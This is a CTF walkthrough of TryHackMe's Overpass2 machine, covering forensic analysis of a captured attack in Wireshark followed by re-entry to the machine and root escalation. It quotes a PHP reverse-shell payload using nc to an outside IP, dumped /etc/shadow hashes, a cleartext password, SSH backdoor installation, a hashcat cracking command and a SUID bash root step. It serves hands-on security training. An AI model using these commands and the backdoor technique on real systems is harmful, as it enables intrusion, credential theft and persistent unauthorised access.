Overpass2 is the seventh machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
That is an unusual type of machine for me. We got the
.pcap file with the network dump.
There are few ways to work with
.pcap files if you are do it all the time, you most likely doing it in the terminal with tools like
If you work with
.pcap files occasionally, you are probably using the
The official guide is recommending to use the
Wireshark so let’s not play a l33t hackerman this time and obey.
.pcap file to your system and open it with
It might look overwhelming, but it not so hard to get used to it after all.
If you never worked with
.pcap files before - it is a format for capturing the network traffic. The first packets will be placed at the top, and you can scroll down the main window to see other packets.
One of the main features of the
Wireshark is the ability to
follow streams. That will transform the content of the file into a more readable format.
Wireshark has tons of features, you should explore it!
The interesting part for us started from the
POST request to the
/development/upload.php page. You can use the
Follow HTTP stream feature to read details.
We can find this command in the body of the
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
The attacker is spawning the reverse shell to the IP address
192.168.170.145 on port
We can also notice that the attacker is using
nc as a communication point, and we know that
nc transferring all data as a clear text. That means we will be able to read everything that happened on the machine, including all commands, provided passwords, etc.
You can scroll the dump a bit and follow another stream started from packet number 32. It’s a
TCP packet, so you can use the
Follow TCP Stream feature of the
/bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python3 -c 'import pty;pty.spawn("/bin/bash")'
The first thing that the attacker did - upgrade the shell to
Fully Interactive TTY with
The next thing that we can use later is the password for user
james right in the stream (it’s was transferred in a clear text, remember?).
james@overpass-production:~$ sudo -l sudo -l [sudo] password for james: whenevernoteartinstant User james may run the following commands on overpass-production: (ALL : ALL) ALL
We can also see that the attacker has the dump of
james@overpass-production:~$ sudo cat /etc/shadow james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
Feel free to crack those hashes! wink
The attacker also established an
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
That’s all we need to know to know.
Analyze the code
It’s a good idea to clone the repo and look around.
main.go contains the original hash for the backdoor and hardcoded salt.
.pcap file we know that the attacker used
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed hash, and from the repo we know that hardcoded salt is
Now you can combine it in the format
hash:salt, and crack it!
The syntax for
hashcat, for instance. You can use other tools if you want.
hashcat -m 1710 -a 0 -o password.txt hash.txt /usr/share/wordlists/rockyou.txt
Get back in!
Now we have everything that might be needed to exploit the machine one more time.
As we already know all details about the backdoor, so we can use it as a shortcut and not re-exploit the machine from the scratch.
ssh is running not on default port
ssh -p 2222 firstname.lastname@example.org
Use the password that you just cracked to login.
Privilege escalation is simple this time.
Let’s look around:
james@overpass-production:/home/james$ ls -la total 1136 drwxr-xr-x 7 james james 4096 Jul 22 03:40 . drwxr-xr-x 7 root root 4096 Jul 21 18:08 .. lrwxrwxrwx 1 james james 9 Jul 21 18:14 .bash_history -> /dev/null -rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc drwx------ 2 james james 4096 Jul 21 00:36 .cache drwx------ 3 james james 4096 Jul 21 00:36 .gnupg drwxrwxr-x 3 james james 4096 Jul 22 03:35 .local -rw------- 1 james james 51 Jul 21 17:45 .overpass -rw-r--r-- 1 james james 807 Apr 4 2018 .profile -rw-r--r-- 1 james james 0 Jul 21 00:37 .sudo_as_admin_successful -rwsr-sr-x 1 root root 1113504 Jul 22 02:57 .suid_bash drwxrwxr-x 3 james james 4096 Jul 22 03:35 ssh-backdoor -rw-rw-r-- 1 james james 38 Jul 22 03:40 user.txt drwxrwxr-x 7 james james 4096 Jul 21 01:37 www
There is a hidden
.suid_bash binary with the
You can run it in order to get root, but keep in mind that you will need to specify the
-p flag to allow the
SUID bit to affect your privileges.
james@overpass-production:/home/james$ ./.suid_bash -p .suid_bash-4.4# whoami root
- Ability to analyze dumps and logs can be priceless
- The whole process of going through this machine is like reading a writeup, you can learn a lot from it.
Do you likes this content?
You can follow me on Twitter to not miss new posts!